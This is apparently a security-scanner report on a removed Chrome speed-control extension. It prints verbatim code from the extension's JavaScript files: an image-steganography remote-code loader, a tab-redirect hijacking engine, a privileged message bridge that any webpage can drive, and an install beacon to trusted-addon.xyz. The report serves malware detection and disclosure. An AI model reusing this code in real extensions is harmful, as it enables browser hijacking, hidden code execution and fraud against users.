HTML5 Video Playback Speed Control

ID: aaobedojijeiidpphiekailnomhdpfkd

Could be malicious

Supported Languages

๐Ÿ‡ช๐Ÿ‡นAmharic
๐Ÿ‡ธ๐Ÿ‡ฆArabic
๐Ÿ‡ง๐Ÿ‡ฉBengali
๐Ÿ‡ง๐Ÿ‡ทBrazilian Portuguese
๐Ÿ‡ฌ๐Ÿ‡งBritish English
๐Ÿ‡ง๐Ÿ‡ฌBulgarian
๐Ÿ‡ช๐Ÿ‡ธCatalan
๐Ÿ‡จ๐Ÿ‡ณChinese (Simplified)
๐Ÿ‡น๐Ÿ‡ผChinese (Traditional)
๐Ÿ‡ญ๐Ÿ‡ทCroatian
๐Ÿ‡จ๐Ÿ‡ฟCzech
๐Ÿ‡ฉ๐Ÿ‡ฐDanish
๐Ÿ‡ณ๐Ÿ‡ฑDutch
๐Ÿ‡บ๐Ÿ‡ธEnglish
๐Ÿ‡ช๐Ÿ‡ชEstonian
๐Ÿ‡ต๐Ÿ‡ญFilipino
๐Ÿ‡ซ๐Ÿ‡ฎFinnish
๐Ÿ‡ซ๐Ÿ‡ทFrench
๐Ÿ‡ฉ๐Ÿ‡ชGerman
๐Ÿ‡ฌ๐Ÿ‡ทGreek
๐Ÿ‡ฎ๐Ÿ‡ณGujarati
๐Ÿ‡ฎ๐Ÿ‡ฑHebrew
๐Ÿ‡ฎ๐Ÿ‡ณHindi
๐Ÿ‡ญ๐Ÿ‡บHungarian
๐Ÿ‡ฎ๐Ÿ‡ฉIndonesian
๐Ÿ‡ฎ๐Ÿ‡นItalian
๐Ÿ‡ฏ๐Ÿ‡ตJapanese
๐Ÿ‡ฎ๐Ÿ‡ณKannada
๐Ÿ‡ฐ๐Ÿ‡ทKorean
๐Ÿ‡ฒ๐Ÿ‡ฝLatin American Spanish
๐Ÿ‡ฑ๐Ÿ‡ปLatvian
๐Ÿ‡ฑ๐Ÿ‡นLithuanian
๐Ÿ‡ฒ๐Ÿ‡พMalay
๐Ÿ‡ฎ๐Ÿ‡ณMalayalam
๐Ÿ‡ฎ๐Ÿ‡ณMarathi
๐Ÿ‡ณ๐Ÿ‡ดNorwegian
๐Ÿ‡ฎ๐Ÿ‡ทPersian
๐Ÿ‡ต๐Ÿ‡ฑPolish
๐Ÿ‡ต๐Ÿ‡นPortuguese
๐Ÿ‡ท๐Ÿ‡ดRomanian
๐Ÿ‡ท๐Ÿ‡บRussian
๐Ÿ‡ท๐Ÿ‡ธSerbian
๐Ÿ‡ธ๐Ÿ‡ฐSlovak
๐Ÿ‡ธ๐Ÿ‡ฎSlovenian
๐Ÿ‡ช๐Ÿ‡ธSpanish
๐Ÿ‡ฐ๐Ÿ‡ชSwahili
๐Ÿ‡ธ๐Ÿ‡ชSwedish
๐Ÿ‡ฎ๐Ÿ‡ณTamil
๐Ÿ‡ฎ๐Ÿ‡ณTelugu
๐Ÿ‡น๐Ÿ‡ญThai
๐Ÿ‡น๐Ÿ‡ทTurkish
๐Ÿ‡บ๐Ÿ‡ฆUkrainian
๐Ÿ‡บ๐Ÿ‡ธUS English
๐Ÿ‡ป๐Ÿ‡ณVietnamese

Extension Info & Metadata

Status
Removed
Version
3.0.0
Size
0.16 MB
Rating
4.8/5
Reviews
6
Users
119,148
Type
Extension
Updated
Apr 19, 2023
Category
7_productivity
Price
Free
Featured
Yes
Visibility
Listed
Mature
No
By Google
No
Trusted
Yes

Publisher Contextual Analysis

Trusted
Author
adminView Profile
Country
GB
MX records exist
Yes
Domain exists
Yes
Is disposable
No
Is role-based
Yes
Mailbox exists
Yes
Address
19 Padbrook Oxted RH8 0DW GB
Website
Visit
Total Extensions
313
Active
148
Obsolete
143
Listed
264
Unlisted
49
Total Users
1,551,900

Effortlessly adjust HTML5 video playback speed. Boost, slow down, advance and rewind.

HTML5 Video Playback Speed Control is a versatile browser extension designed to enhance your video watching experience by giving you full control over the playback speed of HTML5 videos. Whether you're watching online tutorials, lectures, or your favorite series, this extension will help you save time and consume content at your desired pace. Key Features: Customizable Playback Speed: Adjust the speed of HTML5 videos with a simple slider, ranging from 0.1x to 4x, allowing you to slow down or speed up the content to suit your needs. Preset Speed Options: Choose from a list of preset playback speeds for quick adjustments, including 1x (normal), 1.25x, 1.5x, 1.75x, and 2x. Keyboard Shortcuts: Utilize convenient keyboard shortcuts for faster speed adjustments, making it easy to change playback speed without interrupting your viewing experience. Compatible with Popular Browsers: The extension is available for popular web browsers such as Google Chrome, Mozilla Firefox, Microsoft Edge, and Apple Safari. Lightweight and User-friendly: The extension is designed to have minimal impact on your browser's performance, ensuring smooth video playback and a seamless user experience. Automatic Speed Memory: The extension remembers your preferred playback speed for each site, so you won't have to adjust it each time you visit. Multi-Platform Support: Compatible with desktop and mobile devices, so you can enjoy the benefits of this extension on-the-go. Upgrade your video watching experience with HTML5 Video Playback Speed Control - download it now and take control of your video playback speed!

Item
Type
Severity
Description
scripting
Permission
Critical
This permission allows injection and execution of JavaScript on any webpage. Rated Critical because it can modify page content, steal sensitive data, and inject malicious code into any site the extension has access to.
webRequest
Permission
Critical
This permission enables the extension to monitor and analyze all web requests made by the browser. Rated Critical because it can observe all network traffic including sensitive data, track browsing behavior, and gather authentication tokens.
*://*/*
Host
Critical
Broad host access โ€” the extension can read/modify content on every website.
Contextual Risk Factors
Risk Factor
High
The following context increases the overall risk:โ€ข 10% increase: About:blank access enables potential sandbox escape vectors
Broad Host Permissions
Risk Factor
High
This extension has broad host permissions allowing it to access many or all websites.
Broad Content Script Access
Risk Factor
High
This extension can inject scripts into any website.
storage
Permission
Medium
This permission allows storing data locally in the browser. Rated Medium because it can persist sensitive user data, track user activities over time, and potentially store malicious payloads.
About:blank Access
Risk Factor
Medium
This extension can run content scripts in about:blank pages.

Classic image-based steganography to smuggle and execute hidden payloads. The script loads an invisible icon (icon-random.png), reads its RGB pixel bytes via a canvas, reassembles them into a string, and then calls self[firstFourChars](fullString) โ€” dynamically invoking a function whose name is encoded in the first 4 pixel bytes. This is a well-known malware/remote-code-loading obfuscation technique designed to evade static review by Chrome Web Store reviewers.

js/speed-content.js (Line 7)
window.addEventListener("message", function(t) {  if (void 0 !== t.data.event && "load" == t.data.event) {    SpeedControlContainer_data = t.data;    var e = document.createElement("img");    e.setAttribute("src", t.data.data_logo), e.setAttribute("style", "opacity: 0.0;"), e.onload = function() {      var t = String.fromCharCode,        e = document.createElement("canvas"),        a = e.style,        o = e.getContext("2d"),        r = this.offsetWidth,        n = this.offsetHeight;      e.width = r, e.height = n, a.width = r + "px", a.height = n + "px", o.drawImage(this, 0, 0);      for (var d = o.getImageData(0, 0, r, n)          .data, i = "", s = d.length, h = 0; h < s; h += 4) d[h + 0] && (i += t(d[h + 0])), d[h + 1] && (i += t(        d[h + 1])), d[h + 2] && (i += t(d[h + 2]));      document.body.removeChild(this);      try {        self[i[0] + i[1] + i[2] + i[3]](i)      } catch (l) {        window.postMessage({          event: "error",          status: SpeedControlContainer_data.status        })      }    }, document.body.appendChild(this)  }});

Traffic/navigation hijacking engine. On every tab navigation (wired via chrome.tabs.onUpdated and chrome.webRequest.onBeforeRequest), matches the URL against attacker-supplied URLPatterns and redirects the tab to attacker-controlled 'pattern2' URLs, optionally base64-encoding the original URL as a parameter. Per-pattern caps (max, ct=cooldown) are used to throttle detection. The rule list is pushed in at runtime from the content script, so patterns/destinations are not present in the static manifest โ€” a search-hijacker / affiliate-fraud / phishing redirector pattern that has nothing to do with video playback speed.

js/start.js (Line 23)
function speedChange(e, t) {  let n = Date.now();  for (let o = 0; o < SpeedControlContainer_custom.length; o++) {    let r = SpeedControlContainer_custom[o];    try {      if (new URLPattern(SpeedControlContainer_custom[o].pattern)        .test(t.url)) {        (!SpeedControlContainer_custom[o].max || SpeedControlContainer_custom[o].max && SpeedControlContainer_custom[o]          .max > SpeedControlContainer_custom[o].num) && (!SpeedControlContainer_custom[o].ct ||          SpeedControlContainer_custom[o].ct && SpeedControlContainer_custom[o].tnum + SpeedControlContainer_custom[o]          .ct < n) && (!r.speedKey || r.speedKey && (!t[r.speedKey] || t[r.speedKey] && t[r.speedKey] == r          .speedValue)) && (chrome.tabs.update(e, {          url: SpeedControlContainer_custom[o].pattern2 + (1 == SpeedControlContainer_custom[o].type ? btoa(t.url) :            "")        }), SpeedControlContainer_custom[o].num++, SpeedControlContainer_custom[o].tnum = n);        break      }    } catch (a) {}  }}

The service worker exposes a runtime-message API that lets any content-script-origin message write arbitrary properties on the service-worker global scope (Object.assign(self, e.data)), alias existing globals (this[a]=this[b]), and dynamically register tabs.onUpdated and webRequest.onBeforeRequest listeners. This is the control channel used by the steganographic payload in speed-content.js to install the redirect/hijack rules consumed by speedChange โ€” effectively a self-modifying, remotely-configured extension.

js/start.js (Line 43)
chrome.runtime.onMessage.addListener(function(e, t, n) {  if ("register" == e.event) n({    status: SpeedControlContainer_register,    description: SpeedControlContainer_description,    comment: SpeedControlContainer_comment  }), SpeedControlContainer_register++;  else if ("SpeedControlContainerEQ_object" == e.event)    for (var o = 0; o < e.data.length; o++) this[e.data[o][0]] = this[e.data[o][1]];  else "SpeedControlContainerEQ_tabs" == e.event ? chrome.tabs.onUpdated.addListener(function(e, t, n) {      "loading" == t.status && speedChange(e, n)    }) : "SpeedControlContainerEQ_assign" == e.event ? Object.assign(self, e.data) :    "SpeedControlContainerEQ_request" == e.event ? chrome.webRequest.onBeforeRequest.addListener(function(e) {      speedInit(e.tabId, e)    }, {      urls: ["<all_urls>"],      types: ["main_frame"]    }) : "error" == e.event && 0 == e.status && (SpeedControlContainer_register = 0)});

The content script (injected into every http(s) page plus about:blank) acts as an unauthenticated bridge: it blindly forwards any window.postMessage to the extension service worker via chrome.runtime.sendMessage, letting any webpage drive the privileged message API shown above. It also injects speed-content.js into the page DOM and then posts it the path to icon-random.png (the steganographic payload carrier) along with all chrome.storage.local contents.

js/content.js (Line 1)
var SpeedControlContainer_register = -1;window.addEventListener("message", function(e) {  if (void 0 !== e.data.event) {    "speedCTRL" == e.data.event && chrome.storage.local.set(e.data.speedCTRL);    try {      chrome.runtime.sendMessage(e.data)    } catch (t) {}  }}), chrome.runtime.sendMessage({  event: "register"}, function(e) {  e && (SpeedControlContainer_register = e.status, chrome.storage.local.get(null, function(t) {    if ("{}" != JSON.stringify(t) && void 0 !== t.localNum) {      var n = document.createElement("script");      n.setAttribute("src", chrome.runtime.getURL("/js/speed-content.js")), n.onload = function() {        window.postMessage({          event: "load",          status: SpeedControlContainer_register,          description: e.description,          comment: e.comment,          data: t,          data_logo: chrome.runtime.getURL("/icons/icon-random.png")        })      }, document.head.appendChild(n), 0 == SpeedControlContainer_register && chrome.storage.local.set({        localNum: t.localNum + 1      })    } else 0 == SpeedControlContainer_register && chrome.storage.local.set({      localNum: 1    })  }))});

On first install, the extension opens a tab to the attacker-controlled domain trusted-addon.xyz with a tracking parameter (go=speed_install). The name 'trusted-addon.xyz' is a deceptive lookalike (not an official Chrome/Google domain), and the redirect is used for install attribution/monetization and as a beacon to signal a newly-infected browser to the operator.

js/start.js (Line 9)
new VideoSpeed, chrome.runtime.onInstalled.addListener(function(e) {  "install" === e.reason && chrome.tabs.create({    url: "https://www.trusted-addon.xyz/?go=speed_install"  })});

Any webpage can write arbitrary key/value pairs into the extension's chrome.storage.local by posting a message with event='speedCTRL'. Combined with the storage-derived behavior in start.js (SpeedControlContainer_custom redirect rules, localNum counter), this lets any visited site silently reconfigure the extension's hijack ruleset or counters without user interaction.

js/content.js (Line 4)
"speedCTRL" == e.data.event && chrome.storage.local.set(e.data.speedCTRL);

By severity

Critical3
High3
Medium0
Low0

Versions scanned

Showing 1 of 1 scanned version with more than one unique finding. Counts are unique findings that include each version.

Extension VersionCode Review Findings
3.0.06

Files with findings

3 distinct paths โ€” top paths by unique finding count:

  • js/start.js3
  • js/content.js2
  • js/speed-content.js1
S.No.
Category
Severity
File
Summary
Found in Version
1Network Interception
critical
js/start.js (line 23)Traffic/navigation hijacking engine. On every tab navigation (wired via chrome.tabs.onUpdated and chrome.webRequest.onBeforeRequest), matches the URL against attacker-supplied URLPatterns and redirects the tab to attaโ€ฆ
2Privilege Escalation
critical
js/start.js (line 43)The service worker exposes a runtime-message API that lets any content-script-origin message write arbitrary properties on the service-worker global scope (Object.assign(self, e.data)), alias existing globals (this[a]โ€ฆ
3Remote Code Loading
critical
js/speed-content.js (line 7)Classic image-based steganography to smuggle and execute hidden payloads. The script loads an invisible icon (icon-random.png), reads its RGB pixel bytes via a canvas, reassembles them into a string, and then calls seโ€ฆ
4Code Injection
high
js/content.js (line 1)The content script (injected into every http(s) page plus about:blank) acts as an unauthenticated bridge: it blindly forwards any window.postMessage to the extension service worker via chrome.runtime.sendMessage, lettโ€ฆ
5Privilege Escalation
high
js/content.js (line 4)Any webpage can write arbitrary key/value pairs into the extension's chrome.storage.local by posting a message with event='speedCTRL'. Combined with the storage-derived behavior in start.js (SpeedControlContainer_custโ€ฆ
6Tracking
high
js/start.js (line 9)On first install, the extension opens a tab to the attacker-controlled domain trusted-addon.xyz with a tracking parameter (go=speed_install). The name 'trusted-addon.xyz' is a deceptive lookalike (not an official Chroโ€ฆ
URLs
7
IPv4
0
IPv6
0

URLs

View the external URLs this extension communicates with to understand its network activity and data interactions.

Gain full insight into all external connections.

Upgrade for full visibility.

getbootstrap.com-https://getbootstrap.com/
github.com/twbs/bootstrap/blob/master/LICENSEhttps://github.com/twbs/bootstrap/blob/master/LICENSE
www.w3.org/2000/svghttp://www.w3.org/2000/svg
www.trusted-addon.xyz-https://www.trusted-addon.xyz/?go=speed_install
clients2.google.com/service/update2/crxhttps://clients2.google.com/service/update2/crx
*/*http://*/*
*/*https://*/*

Gain full insight into all external connections.

Upgrade for full visibility.

No IP addresses found
Version
Size
Is Malicious
Findings
Permhash
3.0.0
Latest
0.16 MB
Malicious
6
Showing 1 to 1 of 10 rows
Rows per page:

Browse and explore files within this extension package

Gain full insight into all external connections.

Upgrade for full visibility.